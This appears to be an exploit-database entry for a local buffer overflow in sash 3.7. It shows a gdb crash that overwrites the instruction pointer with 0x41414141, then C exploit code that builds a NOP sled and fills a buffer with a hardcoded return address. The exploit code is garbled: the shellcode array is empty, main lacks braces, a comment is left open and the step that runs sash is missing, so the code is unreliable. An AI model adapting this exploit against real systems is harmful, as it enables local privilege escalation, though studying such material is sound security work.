sash <= 3.7 Local Buffer Overflow Exploit

ID 1337DAY-ID-7436
Type zdt
Reporter lammat
Modified 2005-04-08T00:00:00


Exploit for linux platform in category local exploits

sash <= 3.7 Local Buffer Overflow Exploit

/*  sash-3.7 buffer overflow in c argyment
	written by lammat for practice purposes
		[email protected]

(gdb) r -c `perl -e 'print "A"x10256'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /sbin/sash -c `perl -e 'print "A"x10256'`
warning: shared library handler failed to enable breakpoint

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

static char shellcode[]=

#define NOP     0x90
#define LEN     10256
#define RET     0xbfff7770

int main()
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* Filling the buffer... */

for (i=0;i<LEN;i+=4)
   *(long *)&buffer[i] = retaddr;

for (i=0;i<(LEN-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

/* Executing sash */

return 0;

# [2018-03-09]  #